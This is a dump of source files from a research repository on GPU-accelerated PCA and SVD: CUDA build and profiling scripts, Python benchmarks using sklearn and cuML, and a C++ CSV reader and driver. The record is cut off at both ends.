"text": "#!/bin/bash\nexport PATH=\"/usr/local/cuda-11.2/bin:$PATH\" &&\nexport LD_LIBRARY_PATH=\"/usr/local/cuda-11.2/lib64:$LD_LIBRARY_PATH\" &&\n\ncd ../src && \nmake clean && make -j 32 &&\ncd ../objs &&\n\n\nDATA=mnist_784.csv\nNCOMP=784\nTOL=1.e-3\nMAXSWEEPS=15\nECON=1\nVERBOSITY=0\nSOLVER=jacobi\necho \"MNIST PCA\"\nncu -o profile --target-processes all --details-all --print-summary per-gpu --replay-mode application ./cudaPca $DATA $NCOMP $TOL $MAXSWEEPS $ECON $VERBOSITY $SOLVER\n\n\n\n\n"
},
{
"alpha_fraction": 0.6339869499206543,
"alphanum_fraction": 0.6535947918891907,
"avg_line_length": 35.931034088134766,
"blob_id": "7eff989873c75619829d05960cfd23048bb65608",
"content_id": "6a96424cb2b64f87d957b1c32104522e223fc51f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1071,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 29,
"path": "/bench/sklearn/helpers.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\ndef plot_faces(faces, method, result_path, dataset_name):\n fig, axes = plt.subplots(8, 8, figsize=(8, 8))\n for i, ax in enumerate(axes.flat):\n ax.imshow(faces[i].reshape(64, 64), cmap=plt.cm.bone)\n\n plt.title(\"Eigenfaces - Raw Inputs\")\n plt.savefig(f'{result_path}{dataset_name}-{method}.png')\n plt.show()\n\ndef plot_components(components, ncomponents, result_path, dataset_name, method):\n fig = plt.figure(figsize=(16, 6))\n for i in range(30):\n ax = fig.add_subplot(3, 10, i + 1, xticks=[], yticks=[])\n ax.set_title(f\"Comp. {i}\")\n ax.imshow(components[i].reshape((64, 64)), cmap=plt.cm.bone)\n \n plt.savefig(f'{result_path}{dataset_name}-PCA-components-{ncomponents}-method-{method}.png')\n\n\ndef reconstruction(Y, C, M, h, w, image_index):\n n_samples, n_features = Y.shape\n weights = np.dot(Y, C.T)\n centered_vector=np.dot(weights[image_index, :], C)\n recovered_image=(M+centered_vector).reshape(h, w)\n return recovered_image\n"
},
{
"alpha_fraction": 0.5791832804679871,
"alphanum_fraction": 0.5886453986167908,
"avg_line_length": 29.907691955566406,
"blob_id": "e3c048ec50e843ad386bf77e4ee94dae9d1c59b7",
"content_id": "015b19ffb6c706887509d9ff783e48b2a7faa85b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2008,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 65,
"path": "/bench/sklearn/sklearn_pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "from datetime import datetime as dt\nfrom sklearn.decomposition import PCA\nfrom time import perf_counter\nfrom helpers import *\n\n# set dataset name\ndata_file_name = \"face_data.csv\"\ndataset_name = \"Eigenfaces\"\n# dataset_name = \"mnist_784.csv\"\n# dataset_name = \"iris.csv\"\ndata_dir = \"/home/gh/kernelpca/files/\"\nresult_path = \"/home/gh/kernelpca/bench/sklearn/images/\"\nfile_name = data_dir + data_file_name\n\n# read data\nX = pd.read_csv(file_name)\nif 'class' in X:\n X = X.drop('class', axis=1)\nif 'target' in X:\n X = X.drop('target', axis=1)\nif 'variety' in X:\n X = X.drop('variety', axis=1)\nX = X.values\n\nprint(f\"file: {file_name}, shape {X.shape}\")\n\nif dataset_name == \"Eigenfaces\":\n plot_faces(faces=X, method=\"raw\", result_path=result_path, dataset_name=dataset_name)\n\n# run, time, and plot Vanilla PCA\nncomponents = 400\nSVD_METHODS = ['auto', 'randomized', 'arpack']\n\nfor method in SVD_METHODS:\n try:\n time1 = perf_counter()\n pca = PCA(n_components=None\n , copy=True\n , whiten=False\n , svd_solver=method\n , tol=1.e-9\n , iterated_power='auto'\n , random_state=42)\n X_transformed = pca.fit_transform(X)\n time2 = perf_counter()\n\n \n if dataset_name == \"Eigenfaces\":\n plot_components(pca.components_\n , ncomponents=ncomponents\n , result_path=result_path\n , dataset_name=dataset_name\n , method=method)\n # plot_faces(X_transformed, mode=f\"PCA-{method}\")\n\n print(f\"X_transformed shape {X_transformed.shape}\")\n print(f\"sklearn method {method} - seconds: {time2-time1}\")\n except Exception as e:\n print(e)\n print(f\"Error - method {method}\")\n pass\n\n\n# recovered_images=[reconstruction(Y, C, M, h, w, i) for i in range(len(images))]\n# plot_portraits(recovered_images, celebrity_names, h, w, n_row=4, n_col=4)"
},
{
"alpha_fraction": 0.6168003678321838,
"alphanum_fraction": 0.6540821194648743,
"avg_line_length": 28.859155654907227,
"blob_id": "cccc67823b774f389a71997dacdd0e029210267a",
"content_id": "1892654e3e9b5d10e4d93000eb26894b3b642bdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2119,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 71,
"path": "/bench/stack/pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom numpy import linalg as la\nnp.random.seed(42)\n\n\ndef flip_signs(A, B):\n \"\"\"\n utility function for resolving the sign ambiguity in SVD\n http://stats.stackexchange.com/q/34396/115202\n \"\"\"\n signs = np.sign(A) * np.sign(B)\n return A, B * signs\n\n\n# Let the data matrix X be of n x p size,\n# where n is the number of samples and p is the number of variables\n# n, p = 5, 3\n# X = np.random.rand(n, p)\nX = np.array([[1.0, 2.0, 3.0, 41.0], [4.0, 5.0, 6.0, 22.0], [8.0, 5.0, 11.0, 66.0], [22.0, 5.0, 33.0, 77.3], [6.0, 8.0, 10.0, 88.4]])\nn, p = X.shape\nprint(\"n\", n)\nprint(\"p\", p)\n# Let us assume that it is centered\nprint(\"X\", X)\nX -= np.mean(X, axis=0)\nprint(\"X\", X)\n# the p x p covariance matrix\nC = np.cov(X, rowvar=False)\nprint(\"C = \\n\", C)\n# C is a symmetric matrix and so it can be diagonalized:\nl, principal_axes = la.eig(C)\n# sort results wrt. eigenvalues\nidx = l.argsort()[::-1]\nl, principal_axes = l[idx], principal_axes[:, idx]\n# the eigenvalues in decreasing order\nprint(\"l = \\n\", l)\n# a matrix of eigenvectors (each column is an eigenvector)\nprint(\"V = \\n\", principal_axes)\n# projections of X on the principal axes are called principal components\nprincipal_components = X.dot(principal_axes)\nprint(\"Y = \\n\", principal_components)\n\n# we now perform singular value decomposition of X\n# \"economy size\" (or \"thin\") SVD\nU, s, Vt = la.svd(X, full_matrices=False)\nV = Vt.T\nS = np.diag(s)\nprint(\"SVD U\", U)\nprint(\"SVD V\", V)\nprint(\"SVD S\", S)\n\n# 1) then columns of V are principal directions/axes.\nassert np.allclose(*flip_signs(V, principal_axes))\n\n# 2) columns of US are principal components\nassert np.allclose(*flip_signs(U.dot(S), principal_components))\n\n# 3) singular values are related to the eigenvalues of covariance matrix\nassert np.allclose((s ** 2) / (n - 1), l)\n\n# 8) dimensionality reduction\nk = 2\nPC_k = principal_components[:, 0:k]\nUS_k = U[:, 0:k].dot(S[0:k, 0:k])\nassert np.allclose(*flip_signs(PC_k, US_k))\nprint(\"PC_k\", PC_k)\nprint(\"US_k\", US_k)\n# 10) we used \"economy size\" (or \"thin\") SVD\nassert U.shape == (n, p)\nassert S.shape == (p, p)\nassert V.shape == (p, p)"
},
{
"alpha_fraction": 0.6253229975700378,
"alphanum_fraction": 0.682170569896698,
"avg_line_length": 20.27777862548828,
"blob_id": "6e2d92cc0923612fb7a9e09d002c0e9f5d99dd47",
"content_id": "da70f11810eb688d7a3b2a8f02d7e8f32e5f0cfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 387,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 18,
"path": "/scripts/systems_profile.sh",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nexport PATH=\"/usr/local/cuda-11.2/bin:$PATH\" &&\nexport LD_LIBRARY_PATH=\"/usr/local/cuda-11.2/lib64:$LD_LIBRARY_PATH\" &&\n\ncd ../src && \nmake clean && make -j 32 &&\ncd ../objs &&\n\n\nDATA=mnist_784.csv\nNCOMP=784\nTOL=1.e-3\nMAXSWEEPS=15\nECON=1\nVERBOSITY=0\nSOLVER=jacobi\necho \"MNIST PCA\"\nnsys profile --stats=true ./cudaPca $DATA $NCOMP $TOL $MAXSWEEPS $ECON $VERBOSITY $SOLVER\n\n\n\n\n"
},
{
"alpha_fraction": 0.5409705638885498,
"alphanum_fraction": 0.5552904009819031,
"avg_line_length": 29.670732498168945,
"blob_id": "43846a2f74c1405f9a6e35e22b5e766d37985093",
"content_id": "ba6867ffcb9d0b16813da1b6a05f7b6c909c733a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2514,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 82,
"path": "/scripts/compareSolvers.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport pandas as pd \n\ndatasets = [\"iris\"]\ndata_folder = \"../output/\"\nmatrices = [\"alphas\", \"lambdas\", \"trans_data\"]\nkernels = [\"LINEAR\", \"RBF\", \"POLYNOMIAL\"]\ncuml_files = []\nsk_files = []\nfor dataset in datasets:\n for kernel in kernels:\n for matrix in matrices:\n cuml_files.append(\"CUMLKPCA_\" + dataset + \"_\" + kernel + \"_\" + matrix + \".csv\")\n sk_files.append(\"SKKPCA_\" + dataset + \"_\" + kernel + \"_\" + matrix + \".csv\")\n\n\n\nprint(\"cuml files\", cuml_files)\nprint(\"sk_files files\", sk_files)\nfor cuml, skpca in list(zip(cuml_files, sk_files)):\n print(\"Checking \", cuml, skpca)\n cuml_m = np.absolute(pd.read_csv(data_folder + cuml).values)\n sk_m = np.absolute(pd.read_csv(data_folder + skpca, header=None).values)\n\n # trim to scikit learn's ncomponents\n if \"lambdas\" not in cuml:\n cuml_m = cuml_m.T\n cuml_m = cuml_m[:, :sk_m.shape[-1]]\n else:\n cuml_m = cuml_m[:sk_m.shape[0]]\n # print(cuml_m.shape)\n\n print(f\"cuml vals: {cuml_m[:2]}\")\n print(f\"sk_m vals: {sk_m[:2]}\")\n idx = zip(*np.where(~np.isclose(cuml_m, sk_m, rtol=1e-1)))\n\n\n counter = 0\n for x, y in idx:\n print(\"x y\", x, y)\n print(\"MISMATCH idx\", x, y, \" cuml \", cuml_m[x][y], \" sk_m\", sk_m[x][y])\n counter += 1\n if counter > 4:\n break\n\n\n\n if(not np.allclose(cuml_m, sk_m, rtol=1e-1)):\n print(\"MISMATCH cuml\", cuml, \" skpca\", skpca)\n print(\"First 20 cuml \", cuml_m[:10, :10])\n print(\"First 20 sk_m \", sk_m[:10, :10])\n\n\n\n\n\n\n\n# jacobi_data = \"../output/jacobi_\"\n# approx_data = \"../output/approx_\"\n# result_path = \"../bench/sklearn/images/\"\n# approx = \"approx\"\n# jacobi = \"jacobi\"\n\n# jU_file_name = jacobi_data + dataset\n# jS_file_name = jacobi_data + \"S_\" + dataset\n# jVT_file_name = jacobi_data + \"V_\" + dataset\n\n# aU_file_name = approx_data + dataset\n# aS_file_name = approx_data + \"S_\" + dataset\n# aVT_file_name = approx_data + \"V_\" + dataset\n\n# a_S = pd.read_csv(aS_file_name).values\n# j_S = pd.read_csv(jS_file_name).values\n# a_U = pd.read_csv(aU_file_name).values\n# j_U = pd.read_csv(jU_file_name).values\n# a_VT = pd.read_csv(aVT_file_name).values\n# j_VT = pd.read_csv(jVT_file_name).values\n# print(a_U[:10], j_U[:10], sep=\"\\n=======\\n\")\n# print('S', np.allclose(a_S, j_S, rtol=1e-02))\n# print('U', np.allclose(a_U, j_U, rtol=1e-02))\n# print('VT', np.allclose(a_VT, j_VT, rtol=1e-02))"
},
{
"alpha_fraction": 0.5667917728424072,
"alphanum_fraction": 0.5709869861602783,
"avg_line_length": 26.119760513305664,
"blob_id": "cf4db5c7851ddcfb041599c60ecb61c784419349",
"content_id": "ab3137c8dc1eecefd0eb4afb8c54cdf51e65ff61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4529,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 167,
"path": "/src/csv.cpp",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "\n#include <fstream>\n#include <iostream>\n#include <sstream> // std::stringstream\n#include <stdexcept> // std::runtime_error\n#include <string>\n#include <utility> // std::pair\n#include <vector>\n#include \"include/timelogger.h\"\nclass csvInfo {\npublic:\n float *matrix;\n int cols;\n int rows;\n std::vector<std::string> column_names;\n};\n/**\n * Based on this:\n * https://www.gormanalysis.com/blog/reading-and-writing-csv-files-with-cpp/\n */\ncsvInfo read_csv(std::string filename, bool ignore_last_col = true,\n bool col_major = true) {\n // Reads a CSV file into a vector of <string, vector<int>> pairs where\n // each pair represents <column name, column values>\n\n // Create a vector of <string, int vector> pairs to store the result\n std::vector<std::string> col_names;\n csvInfo csv;\n // Create an input filestream\n std::ifstream myFile(filename);\n int num_lines = 0;\n int num_cols = 0;\n // Make sure the file is open\n if (!myFile.is_open())\n throw std::runtime_error(\"Could not open file\");\n\n // Helper vars\n std::string line, colname;\n float val;\n\n // Read the column names\n if (myFile.good()) {\n // Extract the first line in the file\n std::getline(myFile, line);\n\n // Create a stringstream from line\n std::stringstream ss(line);\n\n // Extract each column name\n while (std::getline(ss, colname, ',')) {\n\n // Initialize and add <colname, int vector> pairs to result\n col_names.push_back(colname);\n }\n }\n while (std::getline(myFile, line))\n ++num_lines;\n if (ignore_last_col) {\n col_names.pop_back();\n }\n num_cols = col_names.size();\n myFile.clear();\n myFile.seekg(0);\n std::getline(myFile, line);\n float *matrix = new float[num_cols * num_lines];\n // Read data, line by line\n int index = 0;\n int curr_col = 0;\n while (std::getline(myFile, line)) {\n // Create a stringstream of the current line\n std::stringstream ss(line);\n\n // Extract each float\n while (ss >> val) {\n if (curr_col < num_cols) {\n if (col_major) {\n matrix[index] = val;\n } else {\n matrix[index] = val;\n }\n }\n\n // If the next token is a comma, ignore it and move on\n if (ss.peek() == ',')\n ss.ignore();\n\n // Increment the column index\n index++;\n curr_col++;\n if (curr_col == num_cols) {\n std::string temp;\n ss >> temp;\n }\n }\n curr_col = 0;\n }\n\n // Close file\n myFile.close();\n csv.matrix = matrix;\n csv.cols = num_cols;\n csv.rows = num_lines;\n csv.column_names = col_names;\n return csv;\n}\n\nvoid write_matrix_csv(std::string filename, float *matrix, int rows, int cols,\n bool write_col_names = true) {\n std::ofstream myFile(filename);\n\n // Send column names to the stream\n if (write_col_names) {\n for (int j = 0; j < cols; j++) {\n myFile << j;\n if (j != cols - 1)\n myFile << \",\"; // No comma at end of line\n }\n myFile << \"\\n\";\n }\n\n // Send data to the stream\n for (int i = 0; i < rows; i++) {\n for (int j = 0; j < cols; ++j) {\n myFile << matrix[i * cols + j];\n if (j != cols - 1)\n myFile << \",\"; // No comma at end of line\n }\n myFile << \"\\n\";\n myFile.flush();// TODO try flushing\n }\n // Close the file\n myFile.close();\n}\n\nvoid print_csv(csvInfo csv) {\n float *matrix = csv.matrix;\n int rows = csv.rows;\n int cols = csv.cols;\n for (int i = 0; i < rows; i++) {\n for (int j = 0; j < cols; j++) {\n std::cout << matrix[i * cols + j];\n if (j != cols - 1)\n std::cout << \",\";\n }\n std::cout << std::endl;\n }\n std::cout << \"first \" << csv.matrix[0] << std::endl;\n std::cout << \"last \" << csv.matrix[(csv.rows - 1) * csv.cols + csv.rows 
- 1]\n << std::endl;\n std::cout << \"cols \" << csv.cols << std::endl;\n std::cout << \"rows \" << csv.rows << std::endl;\n std::cout << \"first col name \" << csv.column_names[0] << std::endl;\n}\n\nvoid write_logs(TimeLogger* logger) {\n std::string filename = logger->log_name;\n std::ofstream myFile(filename);\n myFile << \"Function Name,Features,Samples,N Components,Time(ms)\\n\";\n std::vector<TimeLogger::timeLog*> logs = logger->logs;\n for(unsigned int i = 0; i < logs.size(); i++) {\n myFile << logs[i]->name << \",\" << logs[i]->features << \",\" << logs[i]->samples \n << \",\" << logs[i]->n_components << \",\" << logs[i]->time_ms << \"\\n\";\n free(logs[i]);\n }\n std::cout << \"Wrote \" << logs.size() << \" time measurements to \" << filename << std::endl;\n free(logger);\n myFile.close();\n}"
},
{
"alpha_fraction": 0.6252390146255493,
"alphanum_fraction": 0.6826003789901733,
"avg_line_length": 18.370370864868164,
"blob_id": "51403144e8d590929e1010744c9070df990aff9c",
"content_id": "38b2f72297cb12d1f1e605d7aca5fcaa302cc733",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 27,
"path": "/scripts/run.sh",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nexport PATH=\"/usr/local/cuda-11.2/bin:$PATH\" &&\nexport LD_LIBRARY_PATH=\"/usr/local/cuda-11.2/lib64:$LD_LIBRARY_PATH\" &&\n\ncd ../src && \nmake clean && make -j 32 &&\ncd ../objs &&\n\n# echo \"IRIS PCA\"\n# ./cudaPca iris.csv 4\n\nDATA=iris.csv\nNCOMP=4\n# DATA=mnist_784.csv\n# NCOMP=784\nTOL=1.e-3\nMAXSWEEPS=15\nECON=1\nVERBOSITY=0\n#jacobi or approx solver\nSOLVER=jacobi\n# SOLVER=jacobi\necho \"mnist 784\" &&\n./cudaPca $DATA $NCOMP $TOL $MAXSWEEPS $ECON $VERBOSITY $SOLVER\n\n# echo \"EIGENFACES PCA\"\n# ./cudaPca face_data.csv 400\n"
},
{
"alpha_fraction": 0.6254056692123413,
"alphanum_fraction": 0.6305053234100342,
"avg_line_length": 28.561643600463867,
"blob_id": "a629d4ba651640619cdc9a55e2d581fb6a3535c9",
"content_id": "dd45660892b9560bcfa3ef54d458a9175cc001d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2157,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 73,
"path": "/src/main.cpp",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#include \"csv.cpp\"\n#include \"include/pca.cuh\"\n#include <chrono>\n#include <assert.h>\n#ifndef min\n#define min(a, b) ((a < b) ? a : b)\n#endif\n#ifndef max\n#define max(a, b) ((a > b) ? a : b)\n#endif\n\n\ntypedef struct SVD {\n float *U;\n float *S;\n float *V;\n} svd_t;\n\nsvd_t perform_svd(float *A, int m, int n);\n\nint main(int argc, const char *argv[]) {\n // load data file\n std::string filename = argv[1];\n csvInfo csv = read_csv(\"../data/\" + filename);\n\n // number of principal components to find\n int ncomponents = std::stoi(argv[2]);\n\n // error tolerance for eigenvectors\n const float tolerance = std::atof(argv[3]);\n\n // max iterations for jacobi\n const int max_sweeps = std::stoi(argv[4]);\n\n // drop irrelevant submatrices from SVD\n const int economy = std::stoi(argv[5]);\n\n\n // print debug output\n bool verbose = false;\n if (std::stoi(argv[6]) > 0){\n verbose = true;\n }\n\n // svd solver: jacobi or approx\n std::string solver = argv[7];\n\n assert(ncomponents > 0);\n\n printf(\"Calling PCA with n_components %d \", ncomponents);\n printf(\"samples %d features %d \\n\", csv.rows, csv.cols);\n std::cout << \"tolerance \" << tolerance << \"\\n\";\n std::cout << \"max_sweeps \" << max_sweeps << \"\\n\";\n std::cout << \"economy \" << economy << \"\\n\";\n\n TimeLogger *tl = new TimeLogger(csv.rows, csv.cols, ncomponents, \"../logs/\" + filename);\n TimeLogger::timeLog *total_time = tl->start(\"Total Time\");\n float_matrix_t ret = perform_pca(csv.matrix, csv.rows, csv.cols, ncomponents, economy, tolerance, max_sweeps, verbose, tl, solver);\n tl->stop(total_time);\n printf(\"PCA on file %s TOTAL Time measured: %f ms.\\n\", filename.c_str(), total_time->time_ms);\n write_logs(tl);\n\n printf(\"Writing output matrices\\n\");\n // write results to disk\n write_matrix_csv(\"../output/\" + solver + \"_\" + filename, ret.matrix, ret.rows, ret.cols);\n printf(\"min(csv.cols, csv.rows) %d\", min(csv.cols, csv.rows));\n write_matrix_csv(\"../output/\" + solver + \"_S_\" + filename, ret.S, min(csv.cols, csv.rows), 1);\n write_matrix_csv(\"../output/\" + solver + \"_V_\" + filename, ret.V, csv.cols, csv.cols);\n free(ret.S);\n free(ret.V);\n free(ret.matrix);\n return 0;\n}"
},
{
"alpha_fraction": 0.6355140209197998,
"alphanum_fraction": 0.6559048295021057,
"avg_line_length": 30,
"blob_id": "95ccd9e71274011c20afaaafc4660f1dea77b9aa",
"content_id": "7943a45d4fb2d74bbc231f5681f15de972b1b762",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1177,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 38,
"path": "/bench/cuml/pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "from datetime import datetime as dt\nfrom cuml.decomposition import PCA\nimport numpy as np\nfrom time import perf_counter\nimport pandas as pd\n\n# set dataset name\ndataset_name = \"mnist_784.csv\"\ndata_dir = \"../../files/\"\nfile_name = data_dir + dataset_name\n\n# read data\nX = pd.read_csv(file_name)\nX = X.apply(pd.to_numeric, errors='coerce')\nif 'class' in X:\n X = X.drop('class', axis=1)\nif 'target' in X:\n X = X.drop('target', axis=1)\nif 'variety' in X:\n X = X.drop('variety', axis=1)\n\nX = X.values\nX = X.astype(\"float32\")\nsklearn_X = X\nn_components = min(X.shape)\ntime_init_pca = dt.now()\nprint(\"CUML Running PCA with {} features, {} samples, and {} n_components on dataset {}\".format(X.shape[1], X.shape[0], n_components, dataset_name))\npca = PCA(n_components=min(X.shape)\n , copy=True\n , whiten=False\n , svd_solver='jacobi'\n , tol=1.e-3\n , iterated_power=15\n , random_state=42)\ntime_fit_transform = dt.now()\nX_transformed = pca.fit_transform(X)\nprint(\"CUML Time for transform {}ms\".format((dt.now() - time_fit_transform).microseconds / 1000))\nprint(\"CUML Total time {}ms\".format((dt.now() - time_init_pca).microseconds / 1000))"
},
{
"alpha_fraction": 0.5907379388809204,
"alphanum_fraction": 0.6076807379722595,
"avg_line_length": 41.82258224487305,
"blob_id": "03dfcb0a9e3b9dd59d7c8bb6b09e57e5f74c1dff",
"content_id": "15cc0feee4e093c441052aa2fc9f5ee0a64fa2a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2656,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 62,
"path": "/bench/kernelpca/kernelpca_tocsv.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import sklearn\nimport numpy as np\nfrom sklearn.decomposition import KernelPCA\nfrom scipy import linalg\nfrom scipy.sparse.linalg import eigsh\nfrom sklearn.utils.extmath import svd_flip\nfrom sklearn.utils.validation import check_is_fitted, _check_psd_eigenvalues\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import KernelCenterer\nfrom sklearn.metrics.pairwise import pairwise_kernels\nfrom sklearn import datasets\nfrom datetime import datetime as dt\n\n# test = \"manual\"\ntest = \"iris\"\n\nX = np.array([[1.0, 2.0, 5.0], [4.0, 2.0, 1.0]]).T\nout_folder = \"../../output/SKKPCA_\" + test + \"_\"\nif test == \"iris\":\n print(\"Loading iris dataset\")\n iris = datasets.load_iris()\n X = iris.data\n y = iris.target\nprint(\"Shape\", X.shape)\n# KernelType kernel; //!< Type of the kernel function\n# int degree; //!< Degree of polynomial kernel (ignored by others)\n# double gamma; //!< multiplier in the\n# double coef0; \n# prms.kernel = MLCommon::Matrix::KernelParams{Matrix::LINEAR, 0, 0, 0};\n # prms.kernel = MLCommon::Matrix::KernelParams{Matrix::RBF, 0, 1.0/2.0f, 0};\n# prms.kernel = MLCommon::Matrix::KernelParams{Matrix::POLYNOMIAL, 3, 1.0/2.0f, 1};\nkernel_params = [(0,None,0), (0, None, 0), (3, None, 1)]\nmatrices = [\"alphas\", \"lambdas\", \"trans_data\"]\nkernels = [(\"linear\", \"LINEAR\"), (\"rbf\", \"RBF\"), (\"poly\", \"POLYNOMIAL\")]\nfor i in reversed(range(len(kernels))):\n input_kernel, out_kernel = kernels[i]\n degree, gamma, coef0 = kernel_params[i]\n kpca = KernelPCA(n_components=None\n , kernel=input_kernel\n , gamma=gamma\n , degree=degree\n , coef0=coef0\n , kernel_params=None\n , alpha=1.0\n , fit_inverse_transform=False\n , eigen_solver='auto'\n , tol=0\n , max_iter=None\n , remove_zero_eig=False\n , random_state=None\n , copy_X=True\n , n_jobs=-1)\n \n trans_out = kpca.fit_transform(X)\n alphas = kpca.alphas_\n lambdas = kpca.lambdas_\n print(input_kernel, \"trans_out\", trans_out.shape, \"alphas\", alphas.shape, \"lambdas\", lambdas.shape)\n np.savetxt(out_folder + out_kernel + \"_trans_data.csv\", trans_out, delimiter=\",\")\n np.savetxt(out_folder + out_kernel + \"_alphas.csv\", alphas, delimiter=\",\")\n np.savetxt(out_folder + out_kernel + \"_lambdas.csv\", lambdas, delimiter=\",\")\n\n# print(\"SKLEARN KPCA Time for fit_transform {}ms\".format((dt.now() - time_fit_transform).microseconds / 1000))\n\n"
},
{
"alpha_fraction": 0.6423357725143433,
"alphanum_fraction": 0.6671532988548279,
"avg_line_length": 26.440000534057617,
"blob_id": "9decc40addcf53ab2b5ea6a625f75e8c60c28b73",
"content_id": "1a5d22556eed8c1856021d414307a5fe80be769d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 685,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 25,
"path": "/bench/sklearn/faces_to_csv.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport sys\nimport os\nimport imageio\n\nimages_dir = '/home/gh/kernelpca/files/785_faces/train_data/'\nimage_files = []\n\nfor root, dirs, files in os.walk(images_dir, topdown=False):\n for name in files:\n if name.endswith(\".jpg\"):\n file_name = os.path.join(root, name)\n image_files.append(file_name)\n\nimages = []\n\nfor ctr, fname in enumerate(image_files):\n if ctr % 25000 == 0:\n print(ctr)\n images.append((imageio.imread(fname, as_gray=True))/255)\n\nimages = np.array(images)\nnimages = images.shape[0]\nimages = images.reshape((nimages, -1))\nnp.savetxt(\"/home/gh/kernelpca/files/785_faces/train_faces.csv\", images, delimiter=\",\")"
},
{
"alpha_fraction": 0.5546448230743408,
"alphanum_fraction": 0.5655737519264221,
"avg_line_length": 25.214284896850586,
"blob_id": "2629c47660c6ca65cae1c128f2cdbdceb82e8136",
"content_id": "5d77faef418142fa8876acdda699fab45dc80269",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 366,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 14,
"path": "/bench/cumlkpca/run.sh",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "export LD_LIBRARY_PATH=\"${CONDA_PREFIX}/lib\" &&\nnvcc \\\n main.cpp \\\n -o kpcBench \\\n \"-L${CONDA_PREFIX}/lib\" \\\n \"-L/home/tomas/618/raft\" \\\n \"-I${CONDA_PREFIX}/include\" \\\n \"-I${CONDA_PREFIX}/include/cuml/raft\" \\\n -lcuml++ &&\nDATA=iris.csv &&\nNCOMP=4 &&\n# LINEAR RBF POLYNOMIAL \nKERNEL=LINEAR && \n./kpcBench $DATA $NCOMP $KERNEL"
},
{
"alpha_fraction": 0.5588235259056091,
"alphanum_fraction": 0.5757918357849121,
"avg_line_length": 19.090909957885742,
"blob_id": "4d8401a7098a825f7c5e3803f34039f357fb11c4",
"content_id": "d4ddc9aef50d59d7abdbcd56637fec84e8c25a2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 884,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 44,
"path": "/src/Makefile",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "OBJDIR=../objs\n\nEXECUTABLE := ${OBJDIR}/cudaPca\nCU_FILES := pca.cu svd.cu stats.cu svdapprox.cu\nCU_DEPS :=\nCC_FILES := main.cpp\n\n\nall: $(EXECUTABLE)\n\n###########################################################\n\nCXX=g++ -m64\nCXXFLAGS=-O3 -Wall\nLDFLAGS=-L/usr/local/cuda-11.2/lib64/ -lcudart -lcublas -lcusolver\nNVCC=nvcc\nNVCCFLAGS= -O3 -m64 -arch compute_86 -code sm_86 -ccbin /usr/bin/gcc\nOBJS= $(OBJDIR)/main.o $(OBJDIR)/timelogger.o $(OBJDIR)/pca.o $(OBJDIR)/svd.o $(OBJDIR)/svdapprox.o $(OBJDIR)/stats.o \n\n.PHONY: dirs clean\n\nall: $(EXECUTABLE)\n\nformat: \n\tclang-format -i *.cpp *.cu\n\ndefault: $(EXECUTABLE)\n\ndirs:\n\t\tmkdir -p $(OBJDIR)/\n\nclean:\n\t\trm -rf $(OBJDIR) *.ppm *~ $(EXECUTABLE)\n\n$(EXECUTABLE): dirs $(OBJS)\n\t\t$(CXX) $(CXXFLAGS) -o $@ $(OBJS) $(LDFLAGS)\n\n\n\n$(OBJDIR)/%.o: %.cpp\n\t\t$(CXX) $< $(CXXFLAGS) -c -o $@\n\n$(OBJDIR)/%.o: %.cu\n\t\t$(NVCC) $< $(NVCCFLAGS) -c -o $@\n"
},
{
"alpha_fraction": 0.6937354803085327,
"alphanum_fraction": 0.7084299921989441,
"avg_line_length": 40.74193572998047,
"blob_id": "c67c231c2616e0ca2b86e1b0c18b892bff0d80ae",
"content_id": "a192da75a2ebb98ae2662d89c2aa033c95fcd876",
"detected_licenses": [],
"is_generated": false,
